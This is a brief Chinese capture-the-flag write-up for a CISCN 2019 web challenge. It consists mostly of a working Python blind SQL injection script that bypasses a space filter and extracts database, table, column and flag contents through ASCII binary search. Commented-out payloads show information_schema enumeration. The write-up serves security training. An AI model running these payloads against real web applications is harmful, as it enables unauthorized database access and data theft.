[CISCN 2019华北Day2]Web1

开题一眼SQL

抓个包，发现是POST注入

试了一下，过滤了空格，用括号绕过，是个盲注

直接贴个脚本

import requests
import time

url = "http://node2.anna.nssctf.cn:28326/index.php"
payload = {
	"id" : ""
}
result = ""
for i in range(1,100):
	l = 33
	r =130
	mid = (l+r)>>1
	while(l<r):
		# 跑库名
		#"0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{0},1))>{1})".format(i, mid)

		# 跑表名
		#"0^" + "(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctf'),{0},1))>{1})".format(i, mid)

		# 跑列名
		#"0^" + "(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'f111'),{0},1))>{1})".format(i,mid)

		#######################
		#"0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)

		payload["id"] ="0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)

		html = requests.post(url,data=payload)
		print(payload)
		if "Hello" in html.text:
			l = mid+1
		else:
			r = mid
		mid = (l+r)>>1
	if(chr(mid)==" "):
		break
	result = result + chr(mid)
	print(result)
print("flag: " ,result)